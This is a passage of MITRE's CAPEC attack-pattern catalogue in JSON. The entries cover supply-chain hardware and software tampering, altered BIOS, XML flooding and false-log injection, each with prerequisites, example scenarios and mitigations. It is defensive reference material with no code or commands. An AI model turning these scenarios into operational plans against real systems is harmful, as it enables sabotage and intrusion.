Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"520":{"ID":"520","Name":"Counterfeit Hardware Component Inserted During Product Assembly","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with either direct access to the product assembly process or to the supply of subcomponents used in the product assembly process introduces counterfeit hardware components into product assembly. The assembly containing the counterfeit components results in a system specifically designed for malicious purposes.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"The attacker will need either physical access or be able to supply malicious hardware components to the product development facility."},"Skills_Required":{"Skill":["Resources to maliciously construct components used by the manufacturer.",{"Level":"High"},"Resources to physically infiltrate manufacturer or manufacturer\'s supplier.",{"Level":"High"}]},"Example_Instances":{"Example":"A manufacturer of a firewall system requires a hardware card which functions as a multi-jack ethernet card with four ethernet ports. The attacker constructs a counterfeit card that functions normally except that packets from the attacker\'s network are allowed to bypass firewall processing completely. Once deployed at a victim location, this allows the attacker to bypass the firewall unrestricted."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"521":{"ID":"521","Name":"Hardware Design Specifications Are Altered","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with access to a manufacturer\'s hardware manufacturing process documentation alters the design specifications, which introduces flaws advantageous to the attacker once the system is deployed.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"447"}},"Prerequisites":{"Prerequisite":["Advanced knowledge of hardware capabilities of a manufacturer\'s product.","Access to the manufacturer\'s documentation."]},"Skills_Required":{"Skill":["Ability to read, interpret, and subsequently alter manufacturer\'s documentation to cause errors in design specifications.",{"Level":"High"},"Ability to stealthly gain access via remote compromise or physical access to the manufacturer\'s documentation.",{"Level":"High"}]},"Example_Instances":{"Example":"To operate at full capability, a manufacturer\'s network intrusion detection device needs to have either a Intel Xeon E7-2820 or AMD FX-8350 which have 8 \\"cores\\" available, allowing for advanced threading needed to handle large volumes of network traffic without resorting to dropping packets from the detection process. The attacker alters the documentation to state that the system design must use the Intel Core Duo or the AMD Phenom II X2, which only have 2 cores, causing the system to drop large amounts of packets during deployment at a victim site with large amounts of network traffic."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"}}},"522":{"ID":"522","Name":"Malicious Hardware Component Replacement","Abstraction":"Standard","Status":"Draft","Description":"An attacker replaces legitimate hardware in the system with faulty counterfeit or tampered hardware in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"439"}},"Prerequisites":{"Prerequisite":"Physical access to the system after it has left the manufacturer but before it is deployed at the victim location."},"Skills_Required":{"Skill":["Advanced knowledge of the design of the system.",{"Level":"High"},"Hardware creation and manufacture of replacement components.",{"Level":"High"}]},"Mitigations":{"Mitigation":["Ensure that all contractors and sub-suppliers use trusted means of shipping (e.g., bonded/cleared/vetted and insured couriers) to ensure that components, once purchased, are not subject to compromise during their delivery.","Prevent or detect tampering with critical hardware or firmware components while in transit through use of state-of-the-art anti-tamper devices.","Use tamper-resistant and tamper-evident packaging when shipping critical components (e.g., plastic coating for circuit boards, tamper tape, paint, sensors, and/or seals for cases and containers) and inspect received system components for evidence of tampering."]},"Example_Instances":{"Example":"During shipment the attacker is able to intercept a system that has been purchased by the victim, and replaces a math processor card that functions just like the original, but contains advanced malicious capability. Once deployed, the system functions as normal, but allows for the attacker to remotely communicate with the system and use it as a conduit for additional compromise within the victim\'s environment."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Mitigations"}]}},"523":{"ID":"523","Name":"Malicious Software Implanted","Abstraction":"Standard","Status":"Draft","Description":"An attacker implants malicious software into the system in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"439","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"Physical access to the system after it has left the manufacturer but before it is deployed at the victim location."},"Skills_Required":{"Skill":["Advanced knowledge of the design of the system and it\'s operating system components and subcomponents.",{"Level":"High"},"Malicious software creation.",{"Level":"High"}]},"Example_Instances":{"Example":"An attacker has created a piece of malicious software designed to function as a backdoor in a system that is to be deployed at the victim location. During shipment of the system, the attacker has physical access to the system at a loading dock of an integrator for a short time. The attacker unpacks and powers up the system and installs the malicious piece of software, and configures it to run upon system boot. The system is repackaged and returned to its place on the loading dock, and is shipped and installed at the victim location with the malicious software in place, allowing the attacker to bypass firewalls and remotely gain access to the victim\'s network for further malicious activities."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"524":{"ID":"524","Name":"Rogue Integration Procedures","Abstraction":"Standard","Status":"Draft","Description":"An attacker alters or establishes rogue processes in an integration facility in order to insert maliciously altered components into the system. The attacker would then supply the malicious components. This would allow for malicious disruption or additional compromise when the system is deployed.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"439","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"Physical access to an integration facility that prepares the system before it is deployed at the victim location."},"Skills_Required":{"Skill":["Advanced knowledge of the design of the system.",{"Level":"High"},"Hardware creation and manufacture of replacement components.",{"Level":"High"}]},"Example_Instances":{"Example":"An attacker gains access to a system integrator\'s documentation for the preparation of purchased systems designated for deployment at the victim\'s location. As a part of the preparation, the included 100 megabit network card is to be replaced with a 1 gigabit network card. The documentation is altered to reflect the type of 1 gigabit network card to use, and the attacker ensures that this type of network card is provided by the attacker\'s own supply. The card has additional malicious functionality which will allow for additional compromise by the attacker at the victim location once the system is deployed."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"528":{"ID":"528","Name":"XML Flood","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute a flooding attack using XML messages with the intent to deny legitimate users access to a web service. These attacks are accomplished by sending a large number of XML based requests and letting the service attempt to parse each one. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing. XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider\'s memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.","Alternate_Terms":{"Alternate_Term":{"Term":"XML Denial of Service (XML DoS)"}},"Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.","Technique":["Use an automated tool to record all instances of URLs to process XML requests.","Use a browser to manually explore the website and analyze how the application processes XML requests."]},{"Step":"2","Phase":"Experiment","Description":"An adversary crafts input data that may have an adverse effect on the operation of the web service when the XML data sent to the service."},{"Step":"3","Phase":"Exploit","Description":"[Launch a resource depletion attack] The attacker delivers a large number of XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.","Technique":"Send a large number of crafted XML messages to the target URL."}]},"Prerequisites":{"Prerequisite":["The target must receive and process XML transactions.","An adverssary must possess the ability to generate a large amount of XML based messages to send to the target service."]},"Skills_Required":{"Skill":["Denial of service",{"Level":"Low"}]},"Indicators":{"Indicator":"A large amount of data is passed to the XML parser possibly making it crash or otherwise unavailable to end users."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption"}},"Mitigations":{"Mitigation":["Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.","Implementation: Provide for network flow control and traffic shaping to control access to the resources."]},"Example_Instances":{"Example":"Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499.002","Entry_Name":"Endpoint Denial of Service:Service Exhaustion Flood"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, Related_Attack_Patterns, Skills_Required, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"529":{"ID":"529","Name":"Malware-Directed Internal Reconnaissance","Abstraction":"Standard","Status":"Stable","Description":"Adversary uses malware or a similarly controlled application installed inside an organizational perimeter to gather information about the composition, configuration, and security mechanisms of a targeted application, system or network.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must have internal, logical access to the target network and system."},"Skills_Required":{"Skill":["The adversary must be able to obtain or develop, as well as place malicious software inside the target network/system.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The adversary requires a variety of tools to collect information about the target. These include port/network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Keep patches up to date by installing weekly or daily if possible.","Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist."]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}]}},"530":{"ID":"530","Name":"Provide Counterfeit Component","Abstraction":"Detailed","Status":"Draft","Description":"An attacker provides a counterfeit component during the procurement process of a lower-tier component supplier to a sub-system developer or integrator, which is then built into the system being upgraded or repaired by the victim, allowing the attacker to cause disruption or additional compromise.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"531"}},"Prerequisites":{"Prerequisite":"Advanced knowledge about the target system and sub-components."},"Skills_Required":{"Skill":["Able to develop and manufacture malicious system components that resemble legitimate name-brand components.",{"Level":"High"}]},"Example_Instances":{"Example":"The attacker, aware that the victim has contracted with an integrator for system maintenance and that the integrator uses commercial-off-the-shelf network hubs, develops their own network hubs with a built-in malicious capability for remote access, the malicious network hubs appear to be a well-known brand of network hub but are not. The attacker then advertises to the sub-system integrator that they are a legit supplier of network hubs, and offers them at a reduced price to entice the integrator to purchase these network hubs. The integrator then installs the attacker\'s hubs at the victim\'s location, allowing the attacker to remotely compromise the victim\'s network."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Counterfeit Component Supplied",{"Date":"2015-11-09"}]}},"531":{"ID":"531","Name":"Hardware Component Substitution","Abstraction":"Detailed","Status":"Draft","Description":"An attacker substitutes out a tested and approved hardware component for a maliciously-altered hardware component. This type of attack is carried out directly on the system, enabling the attacker to then cause disruption or additional compromise.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"534"}},"Prerequisites":{"Prerequisite":"Physical access to the system or the integration facility where hardware components are kept."},"Skills_Required":{"Skill":["Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts.",{"Level":"High"}]},"Example_Instances":{"Example":"An attacker has access to an organization\'s warehouse of card readers being included as a part of an overall security system. By replacing a critical hardware component in the card reader, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is placed in the warehouse, and later used in the victim\'s security system. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim\'s location for further malicious activity."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Examples-Instances, References, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Hardware Component Substitution After Installation",{"Date":"2015-11-09"}]}},"532":{"ID":"532","Name":"Altered Installed BIOS","Abstraction":"Detailed","Status":"Stable","Description":"An attacker with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":["Advanced knowledge about the installed target system design.","Advanced knowledge about the download and update installation processes.","Access to the download and update system(s) used to deliver BIOS images."]},"Skills_Required":{"Skill":["Able to develop a malicious BIOS image with the original functionality as a normal BIOS image, but with added functionality that allows for later compromise and/or disruption.",{"Level":"High"}]},"Example_Instances":{"Example":"An attacker compromises the download and update portion of a manufacturer\'s web presence, and develops a malicious BIOS that in addition to the normal functionality will also at a specific time of day disable the remote access subsystem\'s security checks. The malicious BIOS is put in place on the manufacturer\'s website, the victim location is sent an official-looking email informing the victim of the availability of a new BIOS with bug fixes and enhanced performance capabilities to entice the victim to install the new BIOS quickly. The malicious BIOS is downloaded and installed on the victim\'s system, which allows for additional compromise by the attacker."},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1542.001","Entry_Name":"Pre-OS Boot:System Firmware"}},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Altered BIOS Installed After Installation",{"Date":"2015-11-09"}]}},"533":{"ID":"533","Name":"Malicious Manual Software Update","Abstraction":"Detailed","Status":"Draft","Description":"An attacker introduces malicious code to the victim\'s system by altering the payload of a software update, allowing for additional compromise or site disruption at the victim location. These manual, or user-assisted attacks, vary from requiring the user to download and run an executable, to as streamlined as tricking the user to click a URL. Attacks which aim at penetrating a specific network infrastructure often rely upon secondary attack methods to achieve the desired impact. Spamming, for example, is a common method employed as an secondary attack vector. Thus the attacker has in their arsenal a choice of initial attack vectors ranging from traditional SMTP/POP/IMAP spamming and its varieties, to web-application mechanisms which commonly implement both chat and rich HTML messaging within the user interface.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"186"}},"Prerequisites":{"Prerequisite":["Advanced knowledge about the download and update installation processes.","Advanced knowledge about the deployed system and its various software subcomponents and processes."]},"Skills_Required":{"Skill":["Able to develop malicious code that can be used on the victim\'s system while maintaining normal functionality.",{"Level":"High"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"494"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, References, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"}],"Previous_Entry_Name":["Malicious Software Update",{"Date":"2015-11-09"}]}},"534":{"ID":"534","Name":"Malicious Hardware Update","Abstraction":"Standard","Status":"Stable","Description":"An adversary introduces malicious hardware during an update or replacement procedure, allowing for additional compromise or site disruption at the victim location. After deployment, it is not uncommon for upgrades and replacements to occur involving hardware and various replaceable parts. These upgrades and replacements are intended to correct defects, provide additional features, and to replace broken or worn-out parts. However, by forcing or tricking the replacement of a good component with a defective or corrupted component, an adversary can leverage known defects to obtain a desired malicious impact.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"440"}},"Skills_Required":{"Skill":["Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts.",{"Level":"High"}]},"Example_Instances":{"Example":"An adversary develops a malicious networking card that allows for normal function plus the addition of malicious functionality that is of benefit to the adversary. The adversary sends the victim an email stating that the existing networking card is faulty, and that the victim can order a replacement card free of charge. The victim orders the card, and the adversary sends the malicious networking card. The malicious networking card replaces the perfectly-functioning original networking card, and the adversary is able to take advantage of the additional malicious functionality to further compromise the victim\'s network."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances"}]}},"535":{"ID":"535","Name":"Malicious Gray Market Hardware","Abstraction":"Detailed","Status":"Draft","Description":"An attacker maliciously alters hardware components that will be sold on the gray market, allowing for victim disruption and compromise when the victim needs replacement hardware components for systems where the parts are no longer in regular supply from original suppliers, or where the hardware components from the attacker seems to be a great benefit from a cost perspective.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"531"}},"Prerequisites":{"Prerequisite":"Physical access to a gray market reseller\'s hardware components supply, or the ability to appear as a gray market reseller to the victim\'s buyer."},"Skills_Required":{"Skill":["Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts.",{"Level":"High"}]},"Example_Instances":{"Example":"An attacker develops co-processor boards with malicious capabilities that are technically the same as a manufacturer\'s expensive upgrade to their flagship system. The victim has installed the manufacturer\'s base system without the expensive upgrade. The attacker contacts the victim and states they have the co-processor boards at a drastically-reduced price, falsely stating they were acquired from a bankruptcy liquidation of a company that had purchased them from the manufacturer. The victim after hearing the drastically reduced price decides to take advantage of the situation and purchases the upgrades from the attacker, and installs them. This allows the attacker to further compromise the victim."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Examples-Instances, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"}}},"536":{"ID":"536","Name":"Data Injected During Configuration","Abstraction":"Standard","Status":"Stable","Description":"An attacker with access to data files and processes on a victim\'s system injects malicious data into critical operational data during configuration or recalibration, causing the victim\'s system to perform in a suboptimal manner that benefits the adversary.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"176","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine configuration process] The adversary, through a previously compromised system, either remotely or physically, determines what the configuration process is. They look at configuration files, data files, and running processes on the system to identify areas where they could inject malicious data."},{"Step":"2","Phase":"Explore","Description":"[Determine when configuration occurs] The adversary needs to then determine when configuration or recalibration of a system occurs so they know when to inject malicious data.","Technique":["Look for a weekly update cycle or repeated update schedule.","Insert a malicious process into the target system that notifies the adversary when configuration is occurring."]},{"Step":"3","Phase":"Experiment","Description":"[Determine malicious data to inject] By looking at the configuration process, the adversary needs to determine what malicious data they want to insert and where to insert it.","Technique":["Add false log data","Change configuration files","Change data files"]},{"Step":"4","Phase":"Exploit","Description":"[Inject malicious data] Right before, or during system configuration, the adversary injects the malicious data. This leads to the system behaving in a way that is beneficial to the adversary and is often followed by other attacks."}]},"Prerequisites":{"Prerequisite":["The attacker must have previously compromised the victim\'s systems or have physical access to the victim\'s systems.","Advanced knowledge of software and hardware capabilities of a manufacturer\'s product."]},"Skills_Required":{"Skill":["Ability to generate and inject false data into operational data into a system with the intent of causing the victim to alter the configuration of the system.",{"Level":"High"}]},"Mitigations":{"Mitigation":"Ensure that proper access control is implemented on all systems to prevent unauthorized access to system files and processes."},"Example_Instances":{"Example":"An adversary wishes to bypass a security system to access an additional network segment where critical data is kept. The adversary knows that some configurations of the security system will allow for remote bypass under certain conditions, such as switching a specific parameter to a different value. The adversary knows the bypass will work but also will be detected within the logging data of the security system. The adversary waits until an upgrade is performed to the security system by the victim\'s system administrators, and the adversary has access to an external logging system. The adversary injects false log entries that cause the administrators to think there are two different error states within the security system - one involving the specific parameter and the other involving the logging entries. The specific parameter is adjusted to a different value, and the logging level is reduced to a lower level that will not cause an adversary bypass to be detected. The adversary stops injecting false log data, and the administrators of the security system believe the issues were caused by the upgrade and are now resolved. The adversary is then able to bypass the security system."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Examples-Instances, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"537":{"ID":"537","Name":"Infiltration of Hardware Development Environment","Abstraction":"Detailed","Status":"Draft","Description":"An attacker, leveraging the ability to manipulate components of primary support systems and tools within the development and production environments, inserts malicious software within the hardware and/or firmware development environment. The infiltration purpose is to alter developed hardware components in a system destined for deployment at the victim\'s organization, for the purpose of disruption or further compromise.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":["The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).","The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.","The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure."]},"Skills_Required":{"Skill":["Intelligence about the manufacturer\'s operating environment and infrastructure.",{"Level":"Medium"},"Ability to develop, deploy, and maintain a stealth malicious backdoor program remotely in what is essentially a hostile environment.",{"Level":"High"},"Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical 